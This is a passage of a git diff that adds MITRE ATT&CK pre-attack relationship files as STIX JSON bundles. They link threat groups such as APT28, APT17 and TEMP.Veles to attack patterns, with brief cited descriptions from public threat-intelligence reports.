+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2d95ed6f-52e7-4708-af15-9a6c08390454.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--849bdc92-52a6-4ab4-90f4-f4f6d88c83c4", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6", + "external_references": [ + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + } + ], + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used Virtual Private Server (VPS) infrastructure.(Citation: FireEye TRITON 2019)", + "relationship_type": "uses", + "id": "relationship--2d95ed6f-52e7-4708-af15-9a6c08390454", + "type": "relationship", + "modified": "2019-04-29T18:59:16.595Z", + "created": "2019-04-24T19:45:44.205Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259.json new file mode 100644 index 0000000000000000000000000000000000000000..89da25ae4aee9a583b178016ebb62ffe76b0cabf --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259.json 
@@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4bc1d334-e9ea-4a1e-b117-0563b68d3ec1", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d.json new file mode 100644 index 0000000000000000000000000000000000000000..5fd99c261c090dddd373b942a6ce95bccf4cc5bf --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--284a38a8-13a3-4684-a929-fb0923722314", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41", + "relationship_type": "related-to", + "target_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--39db1df8-f786-480c-9faf-5b870de2250b.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--39db1df8-f786-480c-9faf-5b870de2250b.json new file mode 100644 index 0000000000000000000000000000000000000000..1f2c99b830fd86a61b8b16c879a515ae7416a43c --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--39db1df8-f786-480c-9faf-5b870de2250b.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--6c5240ff-139d-4c4f-a2fc-1b9de150ebc9", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--39db1df8-f786-480c-9faf-5b870de2250b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used third party email services in the registration of whois records.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "type": "relationship", + "modified": "2019-08-20T13:08:13.437Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e.json new file mode 100644 index 0000000000000000000000000000000000000000..2708f8a1112d15510e5cc4f7eb80566b5de747ed --- /dev/null 
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--0de0e5f2-1b9e-4fb5-9fe5-a3ca0d063314", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT28](https://attack.mitre.org/groups/G0007) registered domains imitating NATO, OSCE security websites, Caucasus information resources and other organizations.(Citation: FireEye APT28) (Citation: US District Court Indictment GRU Oct 2018)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + } + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "relationship_type": "uses", + "target_ref": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", + "type": "relationship", + "modified": "2020-10-01T18:55:39.213Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267.json new file mode 100644 index 0000000000000000000000000000000000000000..0250bf90e48f71ffd1c64743ebba609d7320fd41 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--115fed95-f51e-4678-b3eb-0a1694f89b2d", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11", + "relationship_type": "related-to", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751.json new file mode 100644 index 0000000000000000000000000000000000000000..e1c4d425bab3cf98eda62f3568fd3cbbac5668fe --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--50096c80-ec20-49dc-8a60-499ea7940a82", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--432c700b-4bf3-4824-a530-a6e86882c4b7.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--432c700b-4bf3-4824-a530-a6e86882c4b7.json new file mode 100644 index 0000000000000000000000000000000000000000..2f53b552848bb5a06338ea86d1f81671c0158fe9 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--432c700b-4bf3-4824-a530-a6e86882c4b7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--62501eca-1a48-48bd-a431-9373747b9f03", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--432c700b-4bf3-4824-a530-a6e86882c4b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "relationship_type": "related-to", + "target_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb.json new file mode 100644 index 0000000000000000000000000000000000000000..ee6717d19efa94d553fb7087452c7207deaa90d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb.json 
@@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--38d6e407-87ef-48a4-bc25-a41e4a828d97", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--46f1e7d4-4d73-4e33-b88b-b3bcde5d81fb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "relationship_type": "related-to", + "target_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359.json new file mode 100644 index 0000000000000000000000000000000000000000..c17c340333509264fc781fcf9f1836b023cf8d28 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9ff5827d-1410-4915-a260-b8a39f24191a", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--4a69750c-47d5-40f5-b753-c6bb2a27a359", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d", + "relationship_type": "related-to", + "target_ref": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2.json new file mode 100644 index 0000000000000000000000000000000000000000..764e9efdd585d23cf2c9efeaf53aba7e3aa28c2f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--bd9b6ab1-a075-4c35-b4eb-59850aaccd00", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT16](https://attack.mitre.org/groups/G0023) spearphished journalists, apparently targeting those interested in contact information for DPP members or politicians.(Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "source_name": "FireEye EPS Awakens Part 2" + } + ], + "source_ref": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "relationship_type": "uses", + "target_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "type": "relationship", + "modified": "2019-03-22T14:20:45.708Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--51c20b46-16cc-4b58-80d7-89d48b14b064.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--51c20b46-16cc-4b58-80d7-89d48b14b064.json new file mode 100644 index 0000000000000000000000000000000000000000..fbd6b5cf7d3cf5fb4b247407b8dcc8a69c5b5028 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--51c20b46-16cc-4b58-80d7-89d48b14b064.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--13ecbda5-a07c-4e48-9bf1-c352c118d4a1", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--51c20b46-16cc-4b58-80d7-89d48b14b064", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "relationship_type": "related-to", + "target_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--545cd36e-572e-413d-82b9-db65788791f9.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--545cd36e-572e-413d-82b9-db65788791f9.json new file mode 100644 index 0000000000000000000000000000000000000000..136b16a6aaa73693efe592159d2d6a2a37a4f512 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--545cd36e-572e-413d-82b9-db65788791f9.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--e148d25d-bb33-4b08-a99f-4c041af90e36", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--545cd36e-572e-413d-82b9-db65788791f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) posted in forum threads and created profile pages in Microsoft TechNet.(Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "type": "relationship", + "modified": "2019-03-22T14:21:19.554Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a.json new file mode 100644 index 0000000000000000000000000000000000000000..739b90e56fe9c08e93e0f6c81364a9d2301b89b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a.json 
@@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7d9abb86-1029-4863-a4a2-c4f15e7ba943", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--5dc0b076-5f25-4bda-83c7-1d8bd214b81a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "relationship_type": "related-to", + "target_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4.json new file mode 100644 index 0000000000000000000000000000000000000000..2097e0f2b84feb964c7cc6cc714c4444917764e3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3eaa25d4-a22a-4f39-9d34-1c0a84e71fde", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--60b6c9a6-7705-4c72-93bb-67de0caf11f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--614f64d8-c221-4789-b1e1-787e9326a37b.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--614f64d8-c221-4789-b1e1-787e9326a37b.json new file mode 100644 index 0000000000000000000000000000000000000000..81e17eaa5997684bb6e06ceae0b6c7e79be7fc56 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--614f64d8-c221-4789-b1e1-787e9326a37b.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--d71fb584-82fa-4199-8c92-26b9d716d70c", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--614f64d8-c221-4789-b1e1-787e9326a37b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) created biographical sections on TechNet profile pages to appear more legitimate.(Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "type": "relationship", + "modified": "2019-03-22T14:21:19.541Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a.json new file mode 100644 index 0000000000000000000000000000000000000000..8be337872e225fc35ff94dcd94e0c55f43419a2c --- /dev/null 
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8f7330f4-8e0b-4522-976e-c779679b54e1", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f.json new file mode 100644 index 0000000000000000000000000000000000000000..b12046758978c0b985b7e12e9bd869fcfd5ba3aa --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a868bb1d-8e7f-4144-85f2-e3632c7bf14f", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0.json new file mode 100644 index 0000000000000000000000000000000000000000..894fc8ac8e1ac8c315de280aff151ba7d4ba64eb --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5423cec2-8100-4e22-9462-466fd75100fb", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--6ba71250-1dc7-4b8d-88e7-698440ea18a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "relationship_type": "related-to", + "target_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d.json new file mode 100644 index 0000000000000000000000000000000000000000..33c15edcaf23656984746056d41135728a7fc960 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--af10d58e-73ca-4b30-894c-ecdedab11e19", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT28](https://attack.mitre.org/groups/G0007) reused the SOURFACE downloader as the payload of a lure document.(Citation: FireEye APT28)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + } + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "relationship_type": "uses", + "target_ref": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "type": "relationship", + "modified": "2019-09-09T17:44:35.673Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--715a66b4-7925-40b4-868a-e47aba879f8b.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--715a66b4-7925-40b4-868a-e47aba879f8b.json new file mode 100644 index 0000000000000000000000000000000000000000..119adac9889908574fdb3b7f1e97d6fd51814a95 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--715a66b4-7925-40b4-868a-e47aba879f8b.json 
@@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a1c998fd-8acb-4b54-a036-a573b3484ae1", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--715a66b4-7925-40b4-868a-e47aba879f8b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003.json new file mode 100644 index 0000000000000000000000000000000000000000..375db38fc522e05cf92bd490a2bcd0ab38514ed1 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3127f2b7-fa31-44ab-9212-790409a84a48", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003", + "created_by_ref": 